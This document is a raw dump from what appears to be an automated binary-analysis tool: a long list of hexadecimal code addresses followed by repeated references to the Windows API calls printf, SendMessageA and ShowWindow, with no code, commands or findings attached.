0x0040539e
0x004053a6
0x004053a8
0x004053b3
0x004053b7
0x004053bf
0x004053c0
0x004053c1
0x004053c9
0x004053cb
0x004053d6
0x004053da
0x004053e2
0x004053e3
0x004053e4
0x004053ec
0x004053ee
0x004053f9
0x004053fd
0x00405405
0x00405406
0x00405407
0x0040540f
0x00405411
0x0040541c
0x00405420
0x00405428
0x00405429
0x0040542a
0x00405432
0x00405434
0x0040543f
0x00405443
0x0040544b
0x0040544c
0x0040544d
0x00405455
0x00405457
0x00405462
0x00405466
0x0040546e
0x0040546f
0x00405470
0x00405478
0x0040547a
0x00405485
0x00405489
0x00405491
0x00405492
0x00405493
0x0040549b
0x0040549d
0x004054a8
0x004054ac
0x004054b4
0x004054b5
0x004054b6
0x004054be
0x004054c0
0x004054cb
0x004054cf
0x004054d7
0x004054d8
0x004054d9
0x004054e1
0x004054e3
0x004054ee
0x004054f2
0x004054fa
0x004054fb
0x004054fc
0x00405504
0x00405506
0x00405511
0x00405515
0x0040551d
0x0040551e
0x0040551f
0x00405527
0x00405529
0x00405534
0x00405538
0x00405540
0x00405541
0x00405542
0x0040554a
0x0040554c
0x00405557
0x0040555b
0x00405563
0x00405564
0x00405565
0x0040556d
0x0040556f
0x0040557a
0x0040557e
0x00405586
0x00405587
0x00405588
0x00405590
0x00405592
0x0040559d
0x004055a1
0x004055a9
0x004055aa
0x004055ab
0x004055b3
0x004055b5
0x004055c0
0x004055c4
0x004055cc
0x004055cd
0x004055ce
0x004055d6
0x004055d8
0x004055e3
0x004055e7
0x004055ef
0x004055f0
0x004055f1
0x004055f9
0x004055fb
0x00405606
0x0040560a
0x00405612
0x00405613
0x00405614
0x0040561c
0x0040561e
0x00405629
0x0040562d
0x00405635
0x00405636
0x00405637
0x0040563f
0x00405641
0x0040564c
0x00405650
0x00405658
0x00405659
0x0040565a
0x00405662
0x00405664
0x0040566f
0x00405673
0x0040567b
0x0040567c
0x0040567d
0x00405685
0x00405687
0x00405692
0x00405696
0x0040569e
0x0040569f
0x004056a0
0x004056a8
0x004056aa
0x004056b5
0x004056b9
0x004056c1
0x004056c2
0x004056c3
0x004056cb
0x004056cd
0x004056d8
0x004056dc
0x004056e4
0x004056e5
0x004056e6
0x004056ee
0x004056f0
0x004056fb
0x004056ff
0x00405707
0x00405708
0x00405709
0x00405711
0x00405713
0x0040571e
0x00405722
0x0040572a
0x0040572b
0x0040572c
0x00405734
0x00405736
0x00405741
0x00405745
0x0040574d
0x0040574e
0x0040574f
0x00405757
0x00405759
0x00405764
0x00405768
0x00405770
0x00405771
0x00405772
0x0040577a
0x0040577c
0x00405787
0x0040578b
0x00405793
0x00405794
0x00405795
0x0040579d
0x0040579f
0x004057aa
0x004057ae
0x004057b6
0x004057b7
0x004057b8
0x004057c0
0x004057c2
0x004057cd
0x004057d1
0x004057d9
0x004057da
0x004057db
0x004057e3
0x004057e5
0x004057f0
0x004057f4
0x004057fc
0x004057fd
0x004057fe
0x00405806
0x00405808
0x00405813
0x00405817
0x0040581f
0x00405820
0x00405821
0x00405829
0x0040582b
0x00405836
0x0040583a
0x00405842
0x00405843
0x00405844
0x0040584c
0x0040584e
0x00405859
0x0040585d
0x00405865
0x00405866
0x00405867
0x0040586f
0x00405871
0x0040587c
0x00405880
0x00405888
0x00405889
0x0040588a
0x00405892
0x00405894
0x0040589f
0x004058a3
0x004058ab
0x004058ac
0x004058ad
0x004058b5
0x004058b7
0x004058c2
0x004058c6
0x004058ce
0x004058cf
0x004058d0
0x004058d8
0x004058da
0x004058e5
0x004058e9
0x004058f1
0x004058f2
0x004058f3
0x004058fb
0x004058fd
0x00405908
0x0040590c
0x00405914
0x00405915
0x00405916
0x0040591e
0x00405920
0x0040592b
0x0040592f
0x00405937
0x00405938
0x00405939
0x00405941
0x00405943
0x0040594e
0x00405952
0x0040595a
0x0040595b
0x0040595c
0x00405964
0x00405966
0x00405971
0x00405975
0x0040597d
0x0040597e
0x0040597f
0x00405987
0x00405989
0x00405994
0x00405998
0x004059a0
0x004059a1
0x004059a2
0x004059aa
0x004059ac
0x004059b7
0x004059bb
0x004059c3
0x004059c4
0x004059c5
0x004059cd
0x004059cf
0x004059da
0x004059de
0x004059e6
0x004059e7
0x004059e8
0x004059f0
0x004059f2
0x004059fd
0x00405a01
0x00405a09
0x00405a0a
0x00405a0b
0x00405a13
0x00405a15
0x00405a20
0x00405a24
0x00405a2c
0x00405a2d
0x00405a2e
0x00405a36
0x00405a38
0x00405a43
0x00405a47
0x00405a4f
0x00405a50
0x00405a51
0x00405a59
0x00405a5b
0x00405a66
0x00405a6a
0x00405a72
0x00405a73
0x00405a74
0x00405a7c
0x00405a7e
0x00405a89
0x00405a8d
0x00405a95
0x00405a96
0x00405a97
0x00405a9f
0x00405aa1
0x00405aac
0x00405ab0
0x00405ab8
0x00405ab9
0x00405aba
0x00405ac2
0x00405ac4
0x00405acf
0x00405ad3
0x00405adb
0x00405adc
0x00405add
0x00405ae5
0x00405ae7
0x00405af2
0x00405af6
0x00405afe
0x00405aff
0x00405b00
0x00405b08
0x00405b0a
0x00405b15
0x00405b19
0x00405b21
0x00405b22
0x00405b23
0x00405b2b
0x00405b2d
0x00405b38
0x00405b3c
0x00405b44
0x00405b45
0x00405b46
0x00405b4e
0x00405b50
0x00405b5b
0x00405b5f
0x00405b67
0x00405b68
0x00405b69
0x00405b71
0x00405b73
0x00405b7e
0x00405b82
0x00405b8a
0x00405b8b
0x00405b8c
0x00405b94
0x00405b96
0x00405ba1
0x00405ba5
0x00405bad
0x00405bae
0x00405baf
0x00405bb7
0x00405bb9
0x00405bc4
0x00405bc8
0x00405bd0
0x00405bd1
0x00405bd2
0x00405bda
0x00405bdc
0x00405be7
0x00405beb
0x00405bf3
0x00405bf4
0x00405bf5
0x00405bfd
0x00405bff
0x00405c0a
0x00405c0e
0x00405c16
0x00405c17
0x00405c18
0x00405c20
0x00405c22
0x00405c2d
0x00405c31
0x00405c48
0x00405c4b
0x00405c53
0x00405c56
0x00405c56
0x00405c5a
0x00405c5e
0x00000000
0x00000000
0x004036e7
0x004036e7
0x00405c64
0x00405c6d
0x00405c79

APIs

printf.MSVCRT ref: 00403736
SendMessageA.USER32 ref: 00403743
ShowWindow.USER32(00000000,00000000), ref: 00403747
printf.MSVCRT ref: 00403759
SendMessageA.USER32 ref: 00403766
ShowWindow.USER32(00000000,00000000), ref: 0040376A
printf.MSVCRT ref: 0040377C
SendMessageA.USER32 ref: 00403789
ShowWindow.USER32(00000000,00000000), ref: 0040378D
printf.MSVCRT ref: 0040379F
SendMessageA.USER32 ref: 004037AC
ShowWindow.USER32(00000000,00000000), ref: 004037B0
printf.MSVCRT ref: 004037C2
SendMessageA.USER32 ref: 004037CF
ShowWindow.USER32(00000000,00000000), ref: 004037D3
printf.MSVCRT ref: 004037E5
SendMessageA.USER32 ref: 004037F2
ShowWindow.USER32(00000000,00000000), ref: 004037F6
printf.MSVCRT ref: 00403808
SendMessageA.USER32 ref: 00403815
ShowWindow.USER32(00000000,00000000), ref: 00403819
printf.MSVCRT ref: 0040382B
SendMessageA.USER32 ref: 00403838
ShowWindow.USER32(00000000,00000000), ref: 0040383C
printf.MSVCRT ref: 0040384E
SendMessageA.USER32 ref: 0040385B
ShowWindow.USER32(00000000,00000000), ref: 0040385F
printf.MSVCRT ref: 00403871
SendMessageA.USER32 ref: 0040387E
ShowWindow.USER32(00000000,00000000), ref: 00403882
printf.MSVCRT ref: 00403894
SendMessageA.USER32 ref: 004038A1
ShowWindow.USER32(00000000,00000000), ref: 004038A5
printf.MSVCRT ref: 004038B7
SendMessageA.USER32 ref: 004038C4
ShowWindow.USER32(00000000,00000000), ref: 004038C8
printf.MSVCRT ref: 004038DA
SendMessageA.USER32 ref: 004038E7
ShowWindow.USER32(00000000,00000000), ref: 004038EB
printf.MSVCRT ref: 004038FD
SendMessageA.USER32 ref: 0040390A
ShowWindow.USER32(00000000,00000000), ref: 0040390E
printf.MSVCRT ref: 00403920
SendMessageA.USER32 ref: 0040392D
ShowWindow.USER32(00000000,00000000), ref: 00403931
printf.MSVCRT ref: 00403943
SendMessageA.USER32 ref: 00403950
ShowWindow.USER32(00000000,00000000), ref: 00403954
printf.MSVCRT ref: 00403966
SendMessageA.USER32 ref: 00403973
ShowWindow.USER32(00000000,00000000), ref: 00403977
printf.MSVCRT ref: 00403989
SendMessageA.USER32 ref: 00403996
ShowWindow.USER32(00000000,00000000), ref: 0040399A
printf.MSVCRT ref: 004039AC
SendMessageA.USER32 ref: 004039B9
ShowWindow.USER32(00000000,00000000), ref: 004039BD
printf.MSVCRT ref: 004039CF
SendMessageA.USER32 ref: 004039DC
ShowWindow.USER32(00000000,00000000), ref: 004039E0
printf.MSVCRT ref: 004039F2
SendMessageA.USER32 ref: 004039FF
ShowWindow.USER32(00000000,00000000), ref: 00403A03
printf.MSVCRT ref: 00403A15
SendMessageA.USER32 ref: 00403A22
ShowWindow.USER32(00000000,00000000), ref: 00403A26
printf.MSVCRT ref: 00403A38
SendMessageA.USER32 ref: 00403A45
ShowWindow.USER32(00000000,00000000), ref: 00403A49
printf.MSVCRT ref: 00403A5B
SendMessageA.USER32 ref: 00403A68
ShowWindow.USER32(00000000,00000000), ref: 00403A6C
printf.MSVCRT ref: 00403A7E
SendMessageA.USER32 ref: 00403A8B
ShowWindow.USER32(00000000,00000000), ref: 00403A8F
printf.MSVCRT ref: 00403AA1
SendMessageA.USER32 ref: 00403AAE
ShowWindow.USER32(00000000,00000000), ref: 00403AB2
printf.MSVCRT ref: 00403AC4
SendMessageA.USER32 ref: 00403AD1
ShowWindow.USER32(00000000,00000000), ref: 00403AD5
printf.MSVCRT ref: 00403AE7
SendMessageA.USER32 ref: 00403AF4
ShowWindow.USER32(00000000,00000000), ref: 00403AF8
printf.MSVCRT ref: 00403B0A
SendMessageA.USER32 ref: 00403B17
ShowWindow.USER32(00000000,00000000), ref: 00403B1B
printf.MSVCRT ref: 00403B2D
SendMessageA.USER32 ref: 00403B3A
ShowWindow.USER32(00000000,00000000), ref: 00403B3E
printf.MSVCRT ref: 00403B50
SendMessageA.USER32 ref: 00403B5D
ShowWindow.USER32(00000000,00000000), ref: 00403B61
printf.MSVCRT ref: 00403B73
SendMessageA.USER32 ref: 00403B80
ShowWindow.USER32(00000000,00000000), ref: 00403B84
printf.MSVCRT ref: 00403B96
SendMessageA.USER32 ref: 00403BA3
ShowWindow.USER32(00000000,00000000), ref: 00403BA7
printf.MSVCRT ref: 00403BB9
SendMessageA.USER32 ref: 00403BC6
ShowWindow.USER32(00000000,00000000), ref: 00403BCA
printf.MSVCRT ref: 00403BDC
SendMessageA.USER32 ref: 00403BE9
ShowWindow.USER32(00000000,00000000), ref: 00403BED
printf.MSVCRT ref: 00403BFF
SendMessageA.USER32 ref: 00403C0C
ShowWindow.USER32(00000000,00000000), ref: 00403C10
printf.MSVCRT ref: 00403C22
SendMessageA.USER32 ref: 00403C2F
ShowWindow.USER32(00000000,00000000), ref: 00403C33
printf.MSVCRT ref: 00403C45
SendMessageA.USER32 ref: 00403C52
ShowWindow.USER32(00000000,00000000), ref: 00403C56
printf.MSVCRT ref: 00403C68
SendMessageA.USER32 ref: 00403C75
ShowWindow.USER32(00000000,00000000), ref: 00403C79
printf.MSVCRT ref: 00403C8B
SendMessageA.USER32 ref: 00403C98
ShowWindow.USER32(00000000,00000000), ref: 00403C9C
printf.MSVCRT ref: 00403CAE
SendMessageA.USER32 ref: 00403CBB
ShowWindow.USER32(00000000,00000000), ref: 00403CBF
printf.MSVCRT ref: 00403CD1
SendMessageA.USER32 ref: 00403CDE
ShowWindow.USER32(00000000,00000000), ref: 00403CE2
printf.MSVCRT ref: 00403CF4
SendMessageA.USER32 ref: 00403D01
ShowWindow.USER32(00000000,00000000), ref: 00403D05
printf.MSVCRT ref: 00403D17
SendMessageA.USER32 ref: 00403D24
ShowWindow.USER32(00000000,00000000), ref: 00403D28
printf.MSVCRT ref: 00403D3A
SendMessageA.USER32 ref: 00403D47
ShowWindow.USER32(00000000,00000000), ref: 00403D4B
printf.MSVCRT ref: 00403D5D
SendMessageA.USER32 ref: 00403D6A
ShowWindow.USER32(00000000,00000000), ref: 00403D6E
printf.MSVCRT ref: 00403D80
SendMessageA.USER32 ref: 00403D8D
ShowWindow.USER32(00000000,00000000), ref: 00403D91
printf.MSVCRT ref: 00403DA3
SendMessageA.USER32 ref: 00403DB0
ShowWindow.USER32(00000000,00000000), ref: 00403DB4
printf.MSVCRT ref: 00403DC6
SendMessageA.USER32 ref: 00403DD3
ShowWindow.USER32(00000000,00000000), ref: 00403DD7
printf.MSVCRT ref: 00403DE9
SendMessageA.USER32 ref: 00403DF6
ShowWindow.USER32(00000000,00000000), ref: 00403DFA
printf.MSVCRT ref: 00403E0C
SendMessageA.USER32 ref: 00403E19
ShowWindow.USER32(00000000,00000000), ref: 00403E1D
printf.MSVCRT ref: 00403E2F
SendMessageA.USER32 ref: 00403E3C
ShowWindow.USER32(00000000,00000000), ref: 00403E40
printf.MSVCRT ref: 00403E52
SendMessageA.USER32 ref: 00403E5F
ShowWindow.USER32(00000000,00000000), ref: 00403E63
printf.MSVCRT ref: 00403E75
SendMessageA.USER32 ref: 00403E82
ShowWindow.USER32(00000000,00000000), ref: 00403E86
printf.MSVCRT ref: 00403E98
SendMessageA.USER32 ref: 00403EA5
ShowWindow.USER32(00000000,00000000), ref: 00403EA9
printf.MSVCRT ref: 00403EBB
SendMessageA.USER32 ref: 00403EC8
ShowWindow.USER32(00000000,00000000), ref: 00403ECC
printf.MSVCRT ref: 00403EDE
SendMessageA.USER32 ref: 00403EEB
ShowWindow.USER32(00000000,00000000), ref: 00403EEF
printf.MSVCRT ref: 00403F01
SendMessageA.USER32 ref: 00403F0E
ShowWindow.USER32(00000000,00000000), ref: 00403F12
printf.MSVCRT ref: 00403F24
SendMessageA.USER32 ref: 00403F31
ShowWindow.USER32(00000000,00000000), ref: 00403F35
printf.MSVCRT ref: 00403F47
SendMessageA.USER32 ref: 00403F54
ShowWindow.USER32(00000000,00000000), ref: 00403F58
printf.MSVCRT ref: 00403F6A
SendMessageA.USER32 ref: 00403F77
ShowWindow.USER32(00000000,00000000), ref: 00403F7B
printf.MSVCRT ref: 00403F8D
SendMessageA.USER32 ref: 00403F9A
ShowWindow.USER32(00000000,00000000), ref: 00403F9E
printf.MSVCRT ref: 00403FB0
SendMessageA.USER32 ref: 00403FBD
ShowWindow.USER32(00000000,00000000), ref: 00403FC1
printf.MSVCRT ref: 00403FD3
SendMessageA.USER32 ref: 00403FE0
ShowWindow.USER32(00000000,00000000), ref: 00403FE4
printf.MSVCRT ref: 00403FF6
SendMessageA.USER32 ref: 00404003
ShowWindow.USER32(00000000,00000000), ref: 00404007
printf.MSVCRT ref: 00404019
SendMessageA.USER32 ref: 00404026
ShowWindow.USER32(00000000,00000000), ref: 0040402A
printf.MSVCRT ref: 0040403C
SendMessageA.USER32 ref: 00404049
ShowWindow.USER32(00000000,00000000), ref: 0040404D
printf.MSVCRT ref: 0040405F
SendMessageA.USER32 ref: 0040406C
ShowWindow.USER32(00000000,00000000), ref: 00404070
printf.MSVCRT ref: 00404082
SendMessageA.USER32 ref: 0040408F
ShowWindow.USER32(00000000,00000000), ref: 00404093
printf.MSVCRT ref: 004040A5
SendMessageA.USER32 ref: 004040B2
ShowWindow.USER32(00000000,00000000), ref: 004040B6
printf.MSVCRT ref: 004040C8
SendMessageA.USER32 ref: 004040D5
ShowWindow.USER32(00000000,00000000), ref: 004040D9
printf.MSVCRT ref: 004040EB
SendMessageA.USER32 ref: 004040F8
ShowWindow.USER32(00000000,00000000), ref: 004040FC
printf.MSVCRT ref: 0040410E
SendMessageA.USER32 ref: 0040411B
ShowWindow.USER32(00000000,00000000), ref: 0040411F
printf.MSVCRT ref: 00404131
SendMessageA.USER32 ref: 0040413E
ShowWindow.USER32(00000000,00000000), ref: 00404142
printf.MSVCRT ref: 00404154
SendMessageA.USER32 ref: 00404161
ShowWindow.USER32(00000000,00000000), ref: 00404165
printf.MSVCRT ref: 00404177
SendMessageA.USER32 ref: 00404184
ShowWindow.USER32(00000000,00000000), ref: 00404188
printf.MSVCRT ref: 0040419A
SendMessageA.USER32 ref: 004041A7
ShowWindow.USER32(00000000,00000000), ref: 004041AB
printf.MSVCRT ref: 004041BD
SendMessageA.USER32 ref: 004041CA
ShowWindow.USER32(00000000,00000000), ref: 004041CE
printf.MSVCRT ref: 004041E0
SendMessageA.USER32 ref: 004041ED
ShowWindow.USER32(00000000,00000000), ref: 004041F1
printf.MSVCRT ref: 00404203
SendMessageA.USER32 ref: 00404210
ShowWindow.USER32(00000000,00000000), ref: 00404214
printf.MSVCRT ref: 00404226
SendMessageA.USER32 ref: 00404233
ShowWindow.USER32(00000000,00000000), ref: 00404237
printf.MSVCRT ref: 00404249
SendMessageA.USER32 ref: 00404256
ShowWindow.USER32(00000000,00000000), ref: 0040425A
printf.MSVCRT ref: 0040426C
SendMessageA.USER32 ref: 00404279
ShowWindow.USER32(00000000,00000000), ref: 0040427D
printf.MSVCRT ref: 0040428F
SendMessageA.USER32 ref: 0040429C
ShowWindow.USER32(00000000,00000000), ref: 004042A0
printf.MSVCRT ref: 004042B2
SendMessageA.USER32 ref: 004042BF
ShowWindow.USER32(00000000,00000000), ref: 004042C3
printf.MSVCRT ref: 004042D5
SendMessageA.USER32 ref: 004042E2
ShowWindow.USER32(00000000,00000000), ref: 004042E6
printf.MSVCRT ref: 004042F8
SendMessageA.USER32 ref: 00404305
ShowWindow.USER32(00000000,00000000), ref: 00404309
printf.MSVCRT ref: 0040431B
SendMessageA.USER32 ref: 00404328
ShowWindow.USER32(00000000,00000000), ref: 0040432C
printf.MSVCRT ref: 0040433E
SendMessageA.USER32 ref: 0040434B
ShowWindow.USER32(00000000,00000000), ref: 0040434F
printf.MSVCRT ref: 00404361
SendMessageA.USER32 ref: 0040436E
ShowWindow.USER32(00000000,00000000), ref: 00404372
printf.MSVCRT ref: 00404384
SendMessageA.USER32 ref: 00404391
ShowWindow.USER32(00000000,00000000), ref: 00404395
printf.MSVCRT ref: 004043A7
SendMessageA.USER32 ref: 004043B4
ShowWindow.USER32(00000000,00000000), ref: 004043B8
printf.MSVCRT ref: 004043CA
SendMessageA.USER32 ref: 004043D7
ShowWindow.USER32(00000000,00000000), ref: 004043DB
printf.MSVCRT ref: 004043ED
SendMessageA.USER32 ref: 004043FA
ShowWindow.USER32(00000000,00000000), ref: 004043FE
printf.MSVCRT ref: 00404410
SendMessageA.USER32 ref: 0040441D
ShowWindow.USER32(00000000,00000000), ref: 00404421
printf.MSVCRT ref: 00404433
SendMessageA.USER32 ref: 00404440
ShowWindow.USER32(00000000,00000000), ref: 00404444
printf.MSVCRT ref: 00404456
SendMessageA.USER32 ref: 00404463
ShowWindow.USER32(00000000,00000000), ref: 00404467
printf.MSVCRT ref: 00404479
SendMessageA.USER32 ref: 00404486
ShowWindow.USER32(00000000,00000000), ref: 0040448A
printf.MSVCRT ref: 0040449C
SendMessageA.USER32 ref: 004044A9
ShowWindow.USER32(00000000,00000000), ref: 004044AD
printf.MSVCRT ref: 004044BF
SendMessageA.USER32 ref: 004044CC
ShowWindow.USER32(00000000,00000000), ref: 004044D0
printf.MSVCRT ref: 004044E2
SendMessageA.USER32 ref: 004044EF
ShowWindow.USER32(00000000,00000000), ref: 004044F3
printf.MSVCRT ref: 00404505
SendMessageA.USER32 ref: 00404512
ShowWindow.USER32(00000000,00000000), ref: 00404516
printf.MSVCRT ref: 00404528
SendMessageA.USER32 ref: 00404535
ShowWindow.USER32(00000000,00000000), ref: 00404539
printf.MSVCRT ref: 0040454B
SendMessageA.USER32 ref: 00404558
ShowWindow.USER32(00000000,00000000), ref: 0040455C
printf.MSVCRT ref: 0040456E
SendMessageA.USER32 ref: 0040457B
ShowWindow.USER32(00000000,00000000), ref: 0040457F
printf.MSVCRT ref: 00404591
SendMessageA.USER32 ref: 0040459E
ShowWindow.USER32(00000000,00000000), ref: 004045A2
printf.MSVCRT ref: 004045B4
SendMessageA.USER32 ref: 004045C1
ShowWindow.USER32(00000000,00000000), ref: 004045C5
printf.MSVCRT ref: 004045D7
SendMessageA.USER32 ref: 004045E4
ShowWindow.USER32(00000000,00000000), ref: 004045E8
printf.MSVCRT ref: 004045FA
SendMessageA.USER32 ref: 00404607
ShowWindow.USER32(00000000,00000000), ref: 0040460B
printf.MSVCRT ref: 0040461D
SendMessageA.USER32 ref: 0040462A
ShowWindow.USER32(00000000,00000000), ref: 0040462E
printf.MSVCRT ref: 00404640
SendMessageA.USER32 ref: 0040464D
ShowWindow.USER32(00000000,00000000), ref: 00404651
printf.MSVCRT ref: 00404663
SendMessageA.USER32 ref: 00404670
ShowWindow.USER32(00000000,00000000), ref: 00404674
printf.MSVCRT ref: 00404686
SendMessageA.USER32 ref: 00404693
ShowWindow.USER32(00000000,00000000), ref: 00404697
printf.MSVCRT ref: 004046A9
SendMessageA.USER32 ref: 004046B6
ShowWindow.USER32(00000000,00000000), ref: 004046BA
printf.MSVCRT ref: 004046CC
SendMessageA.USER32 ref: 004046D9
ShowWindow.USER32(00000000,00000000), ref: 004046DD
printf.MSVCRT ref: 004046EF
SendMessageA.USER32 ref: 004046FC
ShowWindow.USER32(00000000,00000000), ref: 00404700
printf.MSVCRT ref: 00404712
SendMessageA.USER32 ref: 0040471F
ShowWindow.USER32(00000000,00000000), ref: 00404723
printf.MSVCRT ref: 00404735
SendMessageA.USER32 ref: 00404742
ShowWindow.USER32(00000000,00000000), ref: 00404746
printf.MSVCRT ref: 00404758
SendMessageA.USER32 ref: 00404765
ShowWindow.USER32(00000000,00000000), ref: 00404769
printf.MSVCRT ref: 0040477B
SendMessageA.USER32 ref: 00404788
ShowWindow.USER32(00000000,00000000), ref: 0040478C
printf.MSVCRT ref: 0040479E
SendMessageA.USER32 ref: 004047AB
ShowWindow.USER32(00000000,00000000), ref: 004047AF
printf.MSVCRT ref: 004047C1
SendMessageA.USER32 ref: 004047CE
ShowWindow.USER32(00000000,00000000), ref: 004047D2
printf.MSVCRT ref: 004047E4
SendMessageA.USER32 ref: 004047F1
ShowWindow.USER32(00000000,00000000), ref: 004047F5
printf.MSVCRT ref: 00404807
SendMessageA.USER32 ref: 00404814
ShowWindow.USER32(00000000,00000000), ref: 00404818
printf.MSVCRT ref: 0040482A
SendMessageA.USER32 ref: 00404837
ShowWindow.USER32(00000000,00000000), ref: 0040483B
printf.MSVCRT ref: 0040484D
SendMessageA.USER32 ref: 0040485A
ShowWindow.USER32(00000000,00000000), ref: 0040485E
printf.MSVCRT ref: 00404870
SendMessageA.USER32 ref: 0040487D
ShowWindow.USER32(00000000,00000000), ref: 00404881
printf.MSVCRT ref: 00404893
SendMessageA.USER32 ref: 004048A0
ShowWindow.USER32(00000000,00000000), ref: 004048A4
printf.MSVCRT ref: 004048B6
SendMessageA.USER32 ref: 004048C3
ShowWindow.USER32(00000000,00000000), ref: 004048C7
printf.MSVCRT ref: 004048D9
SendMessageA.USER32 ref: 004048E6
ShowWindow.USER32(00000000,00000000), ref: 004048EA
printf.MSVCRT ref: 004048FC
SendMessageA.USER32 ref: 00404909
ShowWindow.USER32(00000000,00000000), ref: 0040490D
printf.MSVCRT ref: 0040491F
SendMessageA.USER32 ref: 0040492C
ShowWindow.USER32(00000000,00000000), ref: 00404930
printf.MSVCRT ref: 00404942
SendMessageA.USER32 ref: 0040494F
ShowWindow.USER32(00000000,00000000), ref: 00404953
printf.MSVCRT ref: 00404965
SendMessageA.USER32 ref: 00404972
ShowWindow.USER32(00000000,00000000), ref: 00404976
printf.MSVCRT ref: 00404988
SendMessageA.USER32 ref: 00404995
ShowWindow.USER32(00000000,00000000), ref: 00404999
printf.MSVCRT ref: 004049AB
SendMessageA.USER32 ref: 004049B8
ShowWindow.USER32(00000000,00000000), ref: 004049BC
printf.MSVCRT ref: 004049CE
SendMessageA.USER32 ref: 004049DB
ShowWindow.USER32(00000000,00000000), ref: 004049DF
printf.MSVCRT ref: 004049F1
SendMessageA.USER32 ref: 004049FE
ShowWindow.USER32(00000000,00000000), ref: 00404A02
printf.MSVCRT ref: 00404A14
SendMessageA.USER32 ref: 00404A21
ShowWindow.USER32(00000000,00000000), ref: 00404A25
printf.MSVCRT ref: 00404A37
SendMessageA.USER32 ref: 00404A44
ShowWindow.USER32(00000000,00000000), ref: 00404A48
printf.MSVCRT ref: 00404A5A
SendMessageA.USER32 ref: 00404A67
ShowWindow.USER32(00000000,00000000), ref: 00404A6B
printf.MSVCRT ref: 00404A7D
SendMessageA.USER32 ref: 00404A8A
ShowWindow.USER32(00000000,00000000), ref: 00404A8E
printf.MSVCRT ref: 00404AA0
SendMessageA.USER32 ref: 00404AAD
ShowWindow.USER32(00000000,00000000), ref: 00404AB1
printf.MSVCRT ref: 00404AC3
SendMessageA.USER32 ref: 00404AD0
ShowWindow.USER32(00000000,00000000), ref: 00404AD4
printf.MSVCRT ref: 00404AE6
SendMessageA.USER32 ref: 00404AF3
ShowWindow.USER32(00000000,00000000), ref: 00404AF7
printf.MSVCRT ref: 00404B09
SendMessageA.USER32 ref: 00404B16
ShowWindow.USER32(00000000,00000000), ref: 00404B1A
printf.MSVCRT ref: 00404B2C
SendMessageA.USER32 ref: 00404B39
ShowWindow.USER32(00000000,00000000), ref: 00404B3D
printf.MSVCRT ref: 00404B4F
SendMessageA.USER32 ref: 00404B5C
ShowWindow.USER32(00000000,00000000), ref: 00404B60
printf.MSVCRT ref: 00404B72
SendMessageA.USER32 ref: 00404B7F
ShowWindow.USER32(00000000,00000000), ref: 00404B83
printf.MSVCRT ref: 00404B95
SendMessageA.USER32 ref: 00404BA2
ShowWindow.USER32(00000000,00000000), ref: 00404BA6
printf.MSVCRT ref: 00404BB8
SendMessageA.USER32 ref: 00404BC5
ShowWindow.USER32(00000000,00000000), ref: 00404BC9
printf.MSVCRT ref: 00404BDB
SendMessageA.USER32 ref: 00404BE8
ShowWindow.USER32(00000000,00000000), ref: 00404BEC
printf.MSVCRT ref: 00404BFE
SendMessageA.USER32 ref: 00404C0B
ShowWindow.USER32(00000000,00000000), ref: 00404C0F
printf.MSVCRT ref: 00404C21
SendMessageA.USER32 ref: 00404C2E
ShowWindow.USER32(00000000,00000000), ref: 00404C32
printf.MSVCRT ref: 00404C44
SendMessageA.USER32 ref: 00404C51
ShowWindow.USER32(00000000,00000000), ref: 00404C55
printf.MSVCRT ref: 00404C67
SendMessageA.USER32 ref: 00404C74
ShowWindow.USER32(00000000,00000000), ref: 00404C78
printf.MSVCRT ref: 00404C8A
SendMessageA.USER32 ref: 00404C97
ShowWindow.USER32(00000000,00000000), ref: 00404C9B
printf.MSVCRT ref: 00404CAD
SendMessageA.USER32 ref: 00404CBA
ShowWindow.USER32(00000000,00000000), ref: 00404CBE
printf.MSVCRT ref: 00404CD0
SendMessageA.USER32 ref: 00404CDD
ShowWindow.USER32(00000000,00000000), ref: 00404CE1
printf.MSVCRT ref: 00404CF3
SendMessageA.USER32 ref: 00404D00
ShowWindow.USER32(00000000,00000000), ref: 00404D04
printf.MSVCRT ref: 00404D16
SendMessageA.USER32 ref: 00404D23
ShowWindow.USER32(00000000,00000000), ref: 00404D27
printf.MSVCRT ref: 00404D39
SendMessageA.USER32 ref: 00404D46
ShowWindow.USER32(00000000,00000000), ref: 00404D4A
printf.MSVCRT ref: 00404D5C
SendMessageA.USER32 ref: 00404D69
ShowWindow.USER32(00000000,00000000), ref: 00404D6D
printf.MSVCRT ref: 00404D7F
SendMessageA.USER32 ref: 00404D8C
ShowWindow.USER32(00000000,00000000), ref: 00404D90
printf.MSVCRT ref: 00404DA2
SendMessageA.USER32 ref: 00404DAF
ShowWindow.USER32(00000000,00000000), ref: 00404DB3
printf.MSVCRT ref: 00404DC5
SendMessageA.USER32 ref: 00404DD2
ShowWindow.USER32(00000000,00000000), ref: 00404DD6
printf.MSVCRT ref: 00404DE8
SendMessageA.USER32 ref: 00404DF5
ShowWindow.USER32(00000000,00000000), ref: 00404DF9
printf.MSVCRT ref: 00404E0B
SendMessageA.USER32 ref: 00404E18
ShowWindow.USER32(00000000,00000000), ref: 00404E1C
printf.MSVCRT ref: 00404E2E
SendMessageA.USER32 ref: 00404E3B
ShowWindow.USER32(00000000,00000000), ref: 00404E3F
printf.MSVCRT ref: 00404E51
SendMessageA.USER32 ref: 00404E5E
ShowWindow.USER32(00000000,00000000), ref: 00404E62
printf.MSVCRT ref: 00404E74
SendMessageA.USER32 ref: 00404E81
ShowWindow.USER32(00000000,00000000), ref: 00404E85
printf.MSVCRT ref: 00404E97
SendMessageA.USER32 ref: 00404EA4
ShowWindow.USER32(00000000,00000000), ref: 00404EA8
printf.MSVCRT ref: 00404EBA
SendMessageA.USER32 ref: 00404EC7
ShowWindow.USER32(00000000,00000000), ref: 00404ECB
printf.MSVCRT ref: 00404EDD
SendMessageA.USER32 ref: 00404EEA
ShowWindow.USER32(00000000,00000000), ref: 00404EEE
printf.MSVCRT ref: 00404F00
SendMessageA.USER32 ref: 00404F0D
ShowWindow.USER32(00000000,00000000), ref: 00404F11
printf.MSVCRT ref: 00404F23
SendMessageA.USER32 ref: 00404F30
ShowWindow.USER32(00000000,00000000), ref: 00404F34
printf.MSVCRT ref: 00404F46
SendMessageA.USER32 ref: 00404F53
ShowWindow.USER32(00000000,00000000), ref: 00404F57
printf.MSVCRT ref: 00404F69
SendMessageA.USER32 ref: 00404F76
ShowWindow.USER32(00000000,00000000), ref: 00404F7A
printf.MSVCRT ref: 00404F8C
SendMessageA.USER32 ref: 00404F99
ShowWindow.USER32(00000000,00000000), ref: 00404F9D
printf.MSVCRT ref: 00404FAF
SendMessageA.USER32 ref: 00404FBC
